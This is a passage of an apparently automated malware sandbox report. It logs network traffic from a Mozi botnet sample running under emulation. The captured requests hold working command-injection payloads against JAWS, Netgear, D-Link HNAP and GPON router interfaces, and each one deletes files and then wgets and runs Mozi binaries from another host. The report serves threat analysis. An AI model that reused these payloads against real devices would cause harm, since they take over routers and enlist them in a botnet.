                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 48 4e 41 50 31 26 23 34 37 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 64 32 38 32 38 31 37 26 23 34 36 3b 31 36 31 39 33 37 37 33 35 34 26 23 34 36 3b 35 65 36 62 34 62 34 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;HNAP1&#47;", is invalid.<p>Reference&#32;&#35;9&#46;1d282817&#46;1619377354&#46;5e6b4b44</BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        4192.168.2.205149613.226.101.8380
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:25.179285049 CEST239OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 13.226.101.83:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 20:59:25.327591896 CEST241INHTTP/1.1 403 Forbidden
                                                                                                                        Server: CloudFront
                                                                                                                        Date: Sun, 25 Apr 2021 18:59:25 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 915
                                                                                                                        Connection: keep-alive
                                                                                                                        X-Cache: Error from cloudfront
                                                                                                                        Via: 1.1 161586532656c79144d66d22262047c8.cloudfront.net (CloudFront)
                                                                                                                        X-Amz-Cf-Pop: ATL52-C1
                                                                                                                        X-Amz-Cf-Id: HzrQcxT9kY4DWxPwMHN4uIPTViA9XRQLYXORGv-A-0WbBsnJpwU6XQ==
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 48 7a 72 51 63 78 54 39 6b 59 34 44 57 78 50 77 4d 48 4e 34 75 49 50 54 56 69 41 39 58 52 51 4c 59 58 4f 52 47 76 2d 41 2d 30 57 62 42 73 6e 4a 70 77 55 36 58 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BODY><H1>403 ERROR</H1><H2>The request could not be satisfied.</H2><HR noshade size="1px">Bad request.We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.<BR clear="all">If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.<BR clear="all"><HR noshade size="1px"><PRE>Generated by cloudfront (CloudFront)Request ID: HzrQcxT9kY4DWxPwMHN4uIPTViA9XRQLYXORGv-A-0WbBsnJpwU6XQ==</PRE><ADDRESS></ADDRESS></BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        40192.168.2.2060106154.90.79.10180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:41.290525913 CEST2075OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 154.90.79.101:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 21:02:41.570173025 CEST2076INHTTP/1.1 404 Not Found
                                                                                                                        Date: Sun, 25 Apr 2021 19:02:41 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 259
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 35 34 2e 39 30 2e 37 39 2e 31 30 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 154.90.79.101 Port 80</address></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        41192.168.2.204213423.34.199.8280
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:54.126270056 CEST2134OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 21:02:54.262255907 CEST2135INHTTP/1.0 400 Bad Request
                                                                                                                        Server: AkamaiGHost
                                                                                                                        Mime-Version: 1.0
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 208
                                                                                                                        Expires: Sun, 25 Apr 2021 19:02:54 GMT
                                                                                                                        Date: Sun, 25 Apr 2021 19:02:54 GMT
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 34 36 30 39 36 62 38 26 23 34 36 3b 31 36 31 39 33 37 37 33 37 34 26 23 34 36 3b 65 61 61 30 61 39 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                                                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;b46096b8&#46;1619377374&#46;eaa0a96</BODY></HTML>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        42192.168.2.2043048133.137.248.19180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 21:02:58.345164061 CEST2159OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 133.137.248.191:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        5192.168.2.204180499.192.234.21780
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:25.205521107 CEST239OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 99.192.234.217:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 20:59:25.366274118 CEST242INHTTP/1.1 404 Not Found
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 12
                                                                                                                        Content-Type: text/plain
                                                                                                                        Date: Sun, 25 Apr 2021 18:59:25 GMT
                                                                                                                        Pragma: no-cache
                                                                                                                        Server: 69f8 Kucci


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        6192.168.2.204534461.213.102.3380
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:39.324093103 CEST319OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                                        Host: 127.0.0.1:80
                                                                                                                        Connection: keep-alive
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept: */*
                                                                                                                        User-Agent: Hello, World
                                                                                                                        Content-Length: 118
                                                                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                                        Apr 25, 2021 20:59:39.625205994 CEST320INHTTP/1.0 404 Not found
                                                                                                                        Date: Sun, 25 Apr 2021 18:59:39 GMT


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        7192.168.2.2049960154.201.250.6680
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:39.722923994 CEST321OUTPOST /HNAP1/ HTTP/1.0
                                                                                                                        Host: 154.201.250.66:80
                                                                                                                        Content-Type: text/xml; charset="utf-8"
                                                                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                                        Content-Length: 640
                                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                                        Apr 25, 2021 20:59:40.028264999 CEST330INHTTP/1.1 403 Forbidden
                                                                                                                        Server: nginx/1.10.3
                                                                                                                        Date: Sun, 25 Apr 2021 19:02:21 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 169
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        8192.168.2.2056722164.132.9.22380
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:46.154007912 CEST364OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                                        Apr 25, 2021 20:59:46.208290100 CEST365INHTTP/1.1 403 Forbidden
                                                                                                                        Date: Sun, 25 Apr 2021 18:59:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        Content-Length: 211
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 65 74 75 70 2e 63 67 69 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /setup.cgion this server.</p></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                        9192.168.2.2043006185.29.123.1180
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Apr 25, 2021 20:59:46.157236099 CEST364OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                                                                        User-Agent: Hello, world
                                                                                                                        Host: 185.29.123.11:80
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                        Connection: keep-alive
                                                                                                                        Apr 25, 2021 20:59:46.240031004 CEST366INHTTP/1.1 404 Not Found
                                                                                                                        Date: Sun, 25 Apr 2021 18:59:46 GMT
                                                                                                                        Server: Apache
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        Expires: 0
                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a
                                                                                                                        Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>3404


                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:20:58:43
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:/usr/bin/qemu-arm /tmp/MGuvcs6Ocz
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:43
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
